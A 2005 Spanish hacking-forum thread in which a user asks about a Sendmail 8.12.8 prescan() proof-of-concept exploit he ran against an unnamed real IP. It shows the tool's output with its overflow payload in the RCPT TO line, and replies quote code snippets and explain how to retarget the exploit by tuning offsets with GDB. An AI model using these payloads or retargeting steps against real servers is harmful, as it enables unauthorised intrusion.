elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 11:18  


Tema destacado: Suscripción al boletín mensual de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  exploit bysin2		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: exploit bysin2  (Leído 786 veces)
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
exploit bysin2
« en: 16 Enero 2005, 08:44 »
Hola, alguien conoce este xploit http://exploits.ath.cx/exploits/data/exploits/openssh/bysin2.c

lo e probado, y me dice esto:

$ ./bysin2 xxx.xxx.xxx.xxx
./bysin2 <target ip> <target number>
Sendmail 8.12.8 prescan() exploit by bysin

          Target         Addr            OS
        -------------------------------------------
        * 0              0xbfbfdad1      FreeBSD 4.7-RELEASE


$ ./bysin2 xxx.xxx.xxx.xxx. root <= (por poner algo ya k no sabia k era <target number> )

(y me sale esto)

Sendmail 8.12.8 prescan() exploit by bysin

Resolving address... Address found
Connecting... Connected
Sending exploit...
220 Servidor de Correo ESMTP

HELO yahoo.com

250 Servidor de Correo

MAIL FROM: <a@yahoo.com>

250 ok

RCPT TO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAÑÚżżAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\
˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙

555 syntax error (#5.5.4)


Alguien sabe k es exactamente? gracias
En línea
Ambolius


Desconectado Desconectado

Mensajes: 1.338


/España/Guadalajara


Ver Perfil
Re: exploit bysin2
« Respuesta #1 en: 16 Enero 2005, 10:11 »
Citar
$ ./bysin2 xxx.xxx.xxx.xxx
./bysin2 <target ip> <target number>
Sendmail 8.12.8 prescan() exploit by bysin

          Target         Addr            OS
        -------------------------------------------
        * 0              0xbfbfdad1      FreeBSD 4.7-RELEASE

target ip: IP remota de la victima.
target number: Codigo para el sistema de la victima; en este caso el sistema disponible es FreeBSD 4.7 y corresponde al 0.

Citar
Alguien sabe k es exactamente? gracias

Parece que intenta atacar al servidor por un posible buffer overflow perteneciente al sendmail en la funcion prescan():

Citar
RCPT TO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAÑÚżżAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\
˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙\˙
« Última modificación: 16 Enero 2005, 10:14 por Ambolius » En línea
Un informático a otro:
- żCuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
Re: exploit bysin2
« Respuesta #2 en: 16 Enero 2005, 10:22 »
Pero entonces... se puede hacer algo??? porq e probado otras ips, y me dice no explotaible :S asi que algo se podra hacer xD
En línea
Ambolius


Desconectado Desconectado

Mensajes: 1.338


/España/Guadalajara


Ver Perfil
Re: exploit bysin2
« Respuesta #3 en: 16 Enero 2005, 10:29 »
Por lógica: Si pone "No exploitable" sera porque no se pueda explotar en el host que hayas indicado.

Normalmente, para los bugs sacan parches, y los adminsitradores suelen aplicar esos parches...
En línea
Un informático a otro:
- żCuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
Re: exploit bysin2
« Respuesta #4 en: 16 Enero 2005, 11:20 »
por eso digo.... k con otras ips me dice k no exploitable, es decir k con esta.. se debe poder hacer algo,  este bug es para el puerto 22 (ssh) a ver si alguien puede dar mas info ;) gracias
En línea
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re: exploit bysin2
« Respuesta #5 en: 18 Enero 2005, 07:19 »
Alberto, deberias leer un poco mas :)

Antes de nada, es un POC, un Proof of Concept, prueba de concepto. Es decir, no es un exploit completo. En su enunciado dice claramente que, en el supuesto que funcionara, el sistema atacado tendria un "crash":

Código:
/*
 * Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
 *
 * This is to prove that the bug in sendmail 8.12.8 and below is vulnerable.
 * On sucessful POC exploitation the program should crash with the following:
 *
 * Program received signal SIGSEGV, Segmentation fault.
 * 0x5c5c5c5c in ?? ()
 *
 */

Y no en vano, mas adelante....

Código:
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Server vulnerable (crashed)\n");
exit(0);

Eso por un lado.

Para que te funcionara en otros servidores que no fueran FreeBSD 4-7, tendrias que modificar este offset:

Código:
} archs[] = {
{"FreeBSD 4.7-RELEASE",180,28,0xbfbfdad1},

Por el que le corresponda al server que kieres atacar. Eso solo lo puedes saber o preguntandolo (xD) o testeandolo tu mismo, instalando el SO en tu PC, pruebas el exploit con GDB de por medio, hasta que des con el offset.

Por lo demas, el exploit es bastante sencillo, una pequeña funcion que hace el payload, y lo demas es el sistema de conexion y de chequeo del exito del exploit.

Y por ultimo, si este exploit ataca a Sendmail, que es un servidor SMTP (servidor de correo, de esos que sirven para enviar y recibir mails), tu crees realmente que "sirve" para el puerto 22 que es donde esta el demonio sshd por defecto? No, yo diria que "ataca" al puerto 25 que es donde esta el servidor STMP por defecto, que es donde estara el Sendmail.

PD: No creo que te llege a servir jamas. Configurar un Sendmail tiene guasa, y los admins que los ponen lo conocen muy bien, y seguro que el 99% de los Sendmails del mundo estan actualizados contra ese exploit....

Salu2
En línea
Blog: http://rafaelmbaez.blogspot.com
Twitter: http://twitter.com/rafaelmbaez
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
Re: exploit bysin2
« Respuesta #6 en: 18 Enero 2005, 07:36 »
aja, muchas gracias ;), creo k dejare este exploit xD
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines